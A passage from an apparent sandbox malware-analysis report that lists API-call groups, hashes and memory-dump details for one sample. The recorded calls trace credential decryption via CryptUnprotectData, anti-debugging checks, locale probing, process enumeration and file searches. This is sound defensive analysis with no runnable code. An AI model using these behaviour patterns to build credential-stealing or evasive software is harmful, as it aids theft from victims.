                                            • Instruction ID: fb6762137e67ab75871f9d9920a7fa937a5d51d28300076428a3dd46fda5c188
                                            • Opcode Fuzzy Hash: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
                                            • Instruction Fuzzy Hash: FE12BF71940A28ABCB19EB61DC58EFD737AAF54301F4045EE954A72090EF746F88CF52
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004215B8,00420C32), ref: 0245E1C5
                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 0245E215
                                            • StrCmpCA.SHLWAPI(?,004215C4), ref: 0245E22B
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245E747
                                            • FindClose.KERNEL32(000000FF), ref: 0245E759
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2325840235-0
                                            • Opcode ID: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                            • Instruction ID: 0e764f17be525e01d6066945d124aec541d60ec13ae93f28aad384293f25b851
                                            • Opcode Fuzzy Hash: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                            • Instruction Fuzzy Hash: F1F1AD71954638AACB19EB61DC98EFE733AAF54301F8045EF945A72090EF305F89CE52
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                            • LocalFree.KERNEL32(00000000), ref: 00417EB2
                                             Memory Dump Source
                                             • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                            • String ID: /
                                            • API String ID: 3090951853-4001269591
                                            • Opcode ID: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
                                            • Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
                                            • Opcode Fuzzy Hash: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
                                            • Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9
                                            APIs
                                            • memset.MSVCRT ref: 0040C953
                                            • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,009C94A0), ref: 0040C971
                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                            • memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                            • lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                            • lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                            • lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                             Joe Sandbox IDA Plugin
                                             • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1498829745-0
                                            • Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                            • Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
                                            • Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                            • Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95
                                            APIs
                                            • memset.MSVCRT ref: 0245CBBA
                                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0245CBD8
                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0245CBE3
                                            • memcpy.MSVCRT(?,?,?), ref: 0245CC79
                                            • lstrcat.KERNEL32(?,00420B47), ref: 0245CCAA
                                            • lstrcat.KERNEL32(?,00420B4B), ref: 0245CCBE
                                            • lstrcat.KERNEL32(?,00420B4E), ref: 0245CCDF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1498829745-0
                                            • Opcode ID: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                            • Instruction ID: 9bbec915eddda620fc75c9821f384963f851641bbd6eae93e830813529f1a165
                                            • Opcode Fuzzy Hash: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                            • Instruction Fuzzy Hash: 59415FB4D04229EBDB10CFA0DD88BEEB7B9BB44304F1045AAF509A7280D7745B84CF91
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 0041BEA2
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
                                            • UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
                                            • TerminateProcess.KERNEL32(00000000), ref: 0041BEE5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID: eM
                                            • API String ID: 2579439406-4107679315
                                            • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
                                            • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D
                                            APIs
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                            • LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptLocalString$AllocFree
                                            • String ID: >O@
                                            • API String ID: 4291131564-3498640338
                                            • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
                                            • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: \u$\u${${$}$}
                                            • API String ID: 0-582841131
                                            • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                            • Instruction ID: 7504d442168cb941241940cf30905d0fd8524054b9c43a1a3babdc831899bf7c
                                            • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                            • Instruction Fuzzy Hash: B7416D26E19BD9C5CB068B7444A02EEBFB22FE6110F9D429FC49D1F382C774414AD3A5
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 02467FD8
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 02467FF0
                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 02468004
                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02468059
                                            • LocalFree.KERNEL32(00000000), ref: 02468119
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                            • String ID:
                                            • API String ID: 3090951853-0
                                            • Opcode ID: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                            • Instruction ID: 8064c9af3c8b144dc22e7ddf1c236f71e3ec2f536c9cd51d4642dcea157b7c3a
                                            • Opcode Fuzzy Hash: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                            • Instruction Fuzzy Hash: 24412A71941228ABCB24DB94DC9CBFEB375FB48704F20419AE10AB2190DB746F89CF52
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 0246C109
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0246C11E
                                            • UnhandledExceptionFilter.KERNEL32(0041F2B0), ref: 0246C129
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0246C145
                                            • TerminateProcess.KERNEL32(00000000), ref: 0246C14C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 2579439406-0
                                            • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction ID: 77dba52a2fda7468963fb340ce905291a87ee1d9ce9721bd360c0010ff1d9b72
                                            • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction Fuzzy Hash: 4021B2B8502314DFD710DF59F8896983BB4FB08314F52807BE91897261D7B195858F5D
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                            • String ID:
                                            • API String ID: 3657800372-0
                                            • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
                                            • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 02457514
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0245751B
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02457548
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0245756B
                                            • LocalFree.KERNEL32(?), ref: 02457575
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                            • String ID:
                                            • API String ID: 2609814428-0
                                            • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction ID: 612e82f5369b8bf6116c9877e92105de6408e8223a6c39826673b6d9394fc82a
                                            • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction Fuzzy Hash: F1010CB5A45308BBDB10DFE8DC46F9EB779AB44B04F108556FB05AA2C0D7B0AB40CB65
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
                                            • Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
                                            • Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
                                            • CloseHandle.KERNEL32(00420ACE), ref: 0041980A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 420147892-0
                                            • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
                                            • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02469A15
                                            • Process32First.KERNEL32(00420ACE,00000128), ref: 02469A29
                                            • Process32Next.KERNEL32(00420ACE,00000128), ref: 02469A3E
                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 02469A53
                                            • CloseHandle.KERNEL32(00420ACE), ref: 02469A71
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 420147892-0
                                            • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction ID: c486a9d1a5435bf4b37cac732c947d78c37bf520afce1f75811ca21ab426ae03
                                            • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction Fuzzy Hash: 17011E75A05248EBCB20DFA4CD88BEEB7F9BB08700F10418AF50997240EB719B40CF52
                                            APIs
                                            • CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: ,<A
                                            • API String ID: 123533781-3158208111
                                            • Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                            • Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
                                            • Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                            • Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215E8,00420D79), ref: 0245E809
                                            • StrCmpCA.SHLWAPI(?,004215F0), ref: 0245E859
                                            • StrCmpCA.SHLWAPI(?,004215F4), ref: 0245E86F
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245EF46
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                            • String ID:
                                            • API String ID: 433455689-0
                                            • Opcode ID: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                            • Instruction ID: 2cc29ee13835a8873c59955f446dad75d868d1ee37250c5c89811d4e2e660496
                                            • Opcode Fuzzy Hash: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                            • Instruction Fuzzy Hash: F112FE72A00624ABCB18FBA1DC99EFD7376AF54305F4045AED54A66090EF349F48CF52
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                            • Process32First.KERNEL32(?,00000128), ref: 0041886E
                                            • Process32Next.KERNEL32(?,00000128), ref: 00418883
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • CloseHandle.KERNEL32(?), ref: 004188F1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                            • String ID:
                                            • API String ID: 1066202413-0
                                            • Opcode ID: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
                                            • Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
                                            • Opcode Fuzzy Hash: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
                                            • Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5
                                            APIs
                                            • CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptString
                                            • String ID:
                                            • API String ID: 80407269-0
                                            • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                            • Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
                                            • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                            • Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9
                                            APIs
                                            • CryptBinaryToStringA.CRYPT32(00000000,0245543B,40000001,00000000,00000000,?,0245543B), ref: 024692B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptString
                                            • String ID:
                                            • API String ID: 80407269-0
                                            • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                            • Instruction ID: 83630ebf40af44e1fa58c38a7c754d8a0ddb765834a90a5d671b2cf2fafde07c
                                            • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                            • Instruction Fuzzy Hash: C4111CB4608209BFDB04CF54D888FBB33B9AF89710F009559F9098B250D7B1E981CB61
                                            APIs
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,024551A5,00000000,00000000), ref: 0245A4A6
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,024551A5,00000000,?), ref: 0245A4B8
